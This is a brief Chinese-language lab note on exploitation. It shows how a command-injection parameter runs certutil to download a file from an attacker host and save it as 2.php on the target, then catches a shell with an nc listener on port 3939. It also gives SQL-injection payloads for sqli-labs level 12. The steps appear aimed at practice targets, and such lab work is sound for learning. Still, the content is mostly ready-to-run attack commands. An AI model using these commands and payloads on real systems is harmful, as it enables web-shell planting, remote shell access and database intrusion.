漏洞利用
利用cmd命令远程下载文件 (1.txt不需要创建)
将2.php文件上传
certutil -urlcache -split -f http://192.168.123.150/1.txt 2.php
攻击机中访问:
http://192.168.232.141/1.php?a=certutil -urlcache -split -f http://192.168.101.8/1.txt 2.ph
使用kali的nc监听3939端口
nc -lvvp 3939
浏览器访问2.php文件
监听成功,成功get shel
sqllabs 第12关
当我们输入1'和1时候页面没有反应
那么我们可以构造下面语句进行sql注入。
1" ) or 1=1 #判断是否存在sql注入。
1" ) union select 1,2#